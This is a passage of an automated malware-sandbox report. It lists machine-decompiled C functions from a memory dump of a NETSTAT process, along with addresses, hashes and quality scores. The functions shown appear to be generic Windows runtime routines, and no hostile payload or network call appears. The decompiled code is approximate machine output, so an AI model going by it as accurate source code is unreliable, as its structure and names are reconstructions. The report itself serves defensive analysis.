				_t88 = _t82 -  *0x2f586c0; // 0x3f07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x2f586b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E02E82280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E02F388F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E02EAAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x2f5b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x2f584c0;
										if(_t69 >=  *0x2f584c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E02F39063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E02E6922A(_t82);
							_t53 = E02E87D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E02F38B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x2f586c0; // 0x3f07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x2f586b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x2f586bc;
										_t72 = 0x2f586b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E02E69240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x2f586c4;
									_t72 = 0x2f586c0;
									L18:
									E02E99B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x02e69100
0x02e69100
0x02e69100
0x02e69100
0x02e69102
0x02e69107
0x02e6910c
0x02e69110
0x02e69115
0x02e69136
0x02e69143
0x02ec37e4
0x02ec37e4
0x02e69149
0x02e6914e
0x02e6914e
0x02e69117
0x02e6911d
0x00000000
0x00000000
0x02e6911f
0x02e69125
0x00000000
0x02e69151
0x02e69158
0x02e6915d
0x02e69161
0x02e69168
0x02ec3715
0x00000000
0x02e6916e
0x02e6916e
0x02e69175
0x02e69177
0x02e6917e
0x02e6917f
0x02e69182
0x02e69182
0x02e69187
0x02e69187
0x02e6918a
0x02e6918d
0x02e6918f
0x02e69192
0x02e69195
0x02e69198
0x02e69198
0x02e69198
0x02e6919a
0x00000000
0x00000000
0x02ec371f
0x02ec3721
0x02ec3727
0x02ec372f
0x02ec3733
0x02ec3735
0x02ec3738
0x02ec373b
0x02ec373d
0x02ec3740
0x00000000
0x00000000
0x02ec3746
0x02ec3749
0x00000000
0x00000000
0x02ec374f
0x02ec3751
0x00000000
0x00000000
0x02ec3757
0x02ec3759
0x02ec375c
0x02ec375c
0x02ec375e
0x02ec375e
0x02ec3761
0x02ec3764
0x00000000
0x00000000
0x02ec3766
0x02ec3768
0x02ec37a3
0x02ec37a3
0x02ec37a5
0x02ec37a7
0x02ec37ad
0x02ec37b0
0x02ec37b2
0x02ec37bc
0x02ec37c2
0x02ec37c2
0x02ec37b2
0x02e69187
0x02e69187
0x02e6918a
0x02e6918d
0x02e6918f
0x02e69192
0x02e69195
0x00000000
0x02e69195
0x00000000
0x02e69187
0x02ec376a
0x02ec376a
0x02ec376c
0x02ec376c
0x02ec376f
0x02ec3775
0x00000000
0x00000000
0x02ec3777
0x02ec3779
0x00000000
0x00000000
0x02ec3782
0x02ec3787
0x02ec3789
0x02ec3790
0x02ec3790
0x02ec378b
0x02ec378b
0x02ec378b
0x02ec3792
0x02ec3795
0x02ec3795
0x02ec3798
0x02ec3798
0x02ec379b
0x02ec379b
0x02e691a3
0x02e691a9
0x02e691b0
0x02e691b4
0x02e691b4
0x02e691bb
0x02e691c0
0x02e691c5
0x02e691c7
0x02ec37da
0x02e691cd
0x02e691cd
0x02e691cd
0x02e691d2
0x02e691d5
0x02e69239
0x02e69239
0x02e691d7
0x02e691db
0x02e691e1
0x02e691e7
0x02e691fd
0x02e69203
0x02e6921e
0x02e69223
0x00000000
0x02e69223
0x02e69205
0x02e69208
0x02e6920c
0x02e69214
0x02e69214
0x02e691e9
0x02e691e9
0x02e691ee
0x02e691f3
0x02e691f3
0x02e691f3
0x02e691e7
0x00000000
0x02e691db
0x02e69187
0x02e69168

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f20fe79f5ac1de46c75cfc99b2e5d885603375f09d2b2746e2cb0514d15ce60
Instruction ID: 066003e57b3c71eb71e149c51ffb643371f3d621e73ab38e8b9d2aa034197312
Opcode Fuzzy Hash: 2f20fe79f5ac1de46c75cfc99b2e5d885603375f09d2b2746e2cb0514d15ce60
Instruction Fuzzy Hash: DF31A075AC1245DFDB21DB68C58CBADB7F2BB483D8F25E15AD50867242C334A980CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02E91DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E02E91DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E02E8F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L02E84620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E02E8F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x02e91dc2
0x02e91dc5
0x02e91dc7
0x02e91dcc
0x02e91dce
0x02e91dd6
0x02e91ddf
0x02e91de0
0x02e91de1
0x02e91de5
0x02e91de8
0x02e91def
0x02e91df0
0x02e91df6
0x02e91df7
0x02e91dfe
0x02e91e1a
0x00000000
0x00000000
0x02e91e0b
0x02e91e12
0x02e91e12
0x02e91e00
0x02e91e00
0x02e91e05
0x02e91e1e
0x02e91e23
0x02ed570f
0x02ed5713
0x00000000
0x00000000
0x02ed5719
0x02ed5719
0x02e91e2c
0x02e91e2d
0x02e91e2e
0x02e91e2f
0x02e91e31
0x02e91e32
0x02e91e35
0x02e91e3d
0x02ed5723
0x02ed573d
0x02ed573d
0x00000000
0x02ed5723
0x02e91e49
0x02e91e4e
0x02e91e4e
0x02e91e09
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 17771241b81c760866413b2817c79a375c2fe1b09491fd16cfab608813099727
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 9121837168011AEFDB21DF59CD80EABBBBDEF85644F11905AF9099B210D774AD01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E80050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02E80050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x2f5d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E02E99ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E02EAB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E02F38A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E02E99702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x2f5b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x02e80055
0x02e8005d
0x02e80062
0x02e8006c
0x02e8006f
0x02e80074
0x02e8007a
0x02e8007a
0x02e80080
0x02e80080
0x02e80087
0x02e8008d
0x02e8008f
0x02e80093
0x02e80095
0x02e8009b
0x02e800f8
0x02e800fb
0x02e800fc
0x02e800ff
0x02e80108
0x02e80108
0x02e800a2
0x02e800a6
0x02e800b3
0x02e800bc
0x02e800c5
0x02e800ca
0x02ecc01e
0x00000000
0x00000000
0x02ecc02d
0x02e800d5
0x02e800d9
0x02ecc03d
0x02ecc046
0x02ecc046
0x02e800df
0x02e800e2
0x02e800ea
0x02e800ef
0x02e800f2
0x02e800f6
0x02e80111
0x02e80117
0x02e80117
0x00000000
0x02e800f6
0x02e800d0
0x02e800d0
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f68f09847c988e751755fd212d0c789eeb12bd177c90c1a28c07388249652beb
Instruction ID: 80c23f0d163a4eadb63a65ddb1bbb3c7533e71b77f73f16b54ef21f125a5de6d
Opcode Fuzzy Hash: f68f09847c988e751755fd212d0c789eeb12bd177c90c1a28c07388249652beb
Instruction Fuzzy Hash: E4318F31641B04CFD722DF28C940B96B3E5FF88718F24996DE59A87790DB75A805CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02EE6C0A, Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02EE6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E02E87D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x2f57b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L02E84620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E02EAF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E02E87D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E02EA9AE0();
						_t23 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x02ee6c0a
0x02ee6c0f
0x02ee6c10
0x02ee6c13
0x02ee6c15
0x02ee6c19
0x02ee6c1c
0x02ee6c21
0x02ee6c28
0x02ee6c3a
0x02ee6c2a
0x02ee6c33
0x02ee6c33
0x02ee6c3f
0x02ee6c48
0x02ee6c4d
0x02ee6c60
0x02ee6c65
0x02ee6c69
0x02ee6c73
0x02ee6c79
0x02ee6c7f
0x02ee6c86
0x02ee6c90
0x02ee6c94
0x02ee6ca6
0x02ee6cb2
0x02ee6cbd
0x02ee6cbd
0x02ee6cc3
0x02ee6cc7
0x02ee6ccb
0x02ee6cd0
0x02ee6cd1
0x02ee6ce2
0x02ee6ce2
0x02ee6c69
0x02ee6ced

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83a26715a274ec88e5d55632198696f01431d93f3be70784da7955d118287eaa
Instruction ID: a2ac513005797c6553b9cf3a810f3ff231c277e8bfbff7c1a7fe3ab4dd941f5a
Opcode Fuzzy Hash: 83a26715a274ec88e5d55632198696f01431d93f3be70784da7955d118287eaa
Instruction Fuzzy Hash: B821AB71A40644AFCB11DBA8D880E6AB7B8FF48744F1480A9F909CB791E735ED50CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02EA90AF, Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02EA90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E02EBD4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E02E9E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L02E84620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E02EAF3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E02E9A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x02ea90af
0x02ea90b8
0x02ea90bb
0x02ea90bf
0x02ea90c2
0x02ea90c2
0x02ea90c8
0x02ea90cb
0x02ea90cd
0x02ee14d7
0x02ee14eb
0x02ee14eb
0x00000000
0x02ee14eb
0x02ee14db
0x02ee14e6
0x00000000
0x02ee14f2
0x02ee14e8
0x00000000
0x02ee14e8
0x02ea90d8
0x02ea90da
0x02ea90dd
0x02ea90e5
0x00000000
0x02ea9139
0x02ea90fa
0x02ea90fe
0x02ea9142
0x00000000
0x02ea9142
0x02ea9104
0x02ea9107
0x02ea910b
0x02ea9110
0x02ea9118
0x02ea9147
0x02ea9148
0x02ea914f
0x02ea9150
0x02ea9151
0x02ea9152
0x02ea9156
0x02ea915d
0x02ea9160
0x02ea9168
0x02ea916c
0x02ea91bc
0x02ea91be
0x00000000
0x02ea91be
0x02ea916e
0x02ea9173
0x02ea9176
0x00000000
0x00000000
0x02ea917c
0x02ea9180
0x02ea91b5
0x00000000
0x02ea91b5
0x02ea9182
0x02ea9185
0x02ea9189
0x00000000
0x00000000
0x02ea918e
0x02ea9190
0x02ea9198
0x00000000
0x00000000
0x02ea91a0
0x00000000
0x02ea91ad
0x02ea91ad
0x02ea91b0
0x02ea91b1
0x00000000
0x02ea9185
0x02ea911a
0x02ea911c
0x02ea911f
0x02ea9125
0x02ea9127
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 9dc28ecf1605aa2ef5371bd969db951f4e97f0df458fb4c4eef7f05bb23b1987
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 1A218071A80204EFDB20DF59C854AAAF7F8EF54354F15D86AE949AB201D330ED40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E93B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02E93B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x2f584c4; // 0x0
				_v12 = 1;
				_v8 =  *0x2f584c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2f584c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E02EAAA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E02EAFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2f584c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x2f584c4; // 0x0
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x02e93b89
0x02e93b96
0x02e93ba1
0x02e93bab
0x02e93bb5
0x02e93bb9
0x02ed6298
0x02e93bbf
0x02e93bc2
0x02e93bc3
0x02e93bc9
0x02e93bca
0x02e93bcc
0x02e93bcd
0x02e93bd4
0x02e93bd6
0x02e93bdb
0x02e93bea
0x02e93bf7
0x02e93bfb
0x02e93bff
0x02e93c09
0x02e93c0a
0x02e93c0b
0x02e93c0f
0x02e93c14
0x02e93c18
0x02e93c18
0x02e93bfb
0x02e93c1b
0x02e93c30
0x02e93c30
0x02e93c3d

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5c0eb9dc372d79ae9703e81d1172bac18b1e377afc0bc6337640fe374d05bd
Instruction ID: 9bec04737c565b78cc4b49591265015d94fb6a5e1a8708d61a10138b0f8aae7f
Opcode Fuzzy Hash: 4e5c0eb9dc372d79ae9703e81d1172bac18b1e377afc0bc6337640fe374d05bd
Instruction Fuzzy Hash: 2121F972A40518AFCB00DF98CD81F5AB7BDFB40348F1554A9FA099B251D371ED51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02EE6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02EE6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E02E87D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E02E87D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x2e45c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E02E9F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E02E9F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E02EE7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L02E82400( &_v52);
								}
								_t21 = L02E82400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x02ee6cfb
0x02ee6d00
0x02ee6d02
0x02ee6d06
0x02ee6d0a
0x02ee6d0e
0x02ee6d19
0x02ee6d2b
0x02ee6d1b
0x02ee6d24
0x02ee6d24
0x02ee6d33
0x02ee6d39
0x02ee6d46
0x02ee6d4f
0x02ee6d61
0x02ee6d51
0x02ee6d5a
0x02ee6d5a
0x02ee6d69
0x02ee6d6b
0x02ee6d6d
0x02ee6d6f
0x02ee6d6f
0x02ee6d74
0x02ee6d79
0x02ee6d7a
0x02ee6d7f
0x02ee6d82
0x02ee6d88
0x02ee6d89
0x02ee6d90
0x02ee6d94
0x02ee6da7
0x02ee6db1
0x02ee6db1
0x02ee6dbb
0x02ee6dbb
0x02ee6d90
0x02ee6d69
0x02ee6d46
0x02ee6dc6

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2b81da4cd5c0bb565c923187b5aa783220f60ef984d6e7c125403cd950ed48b
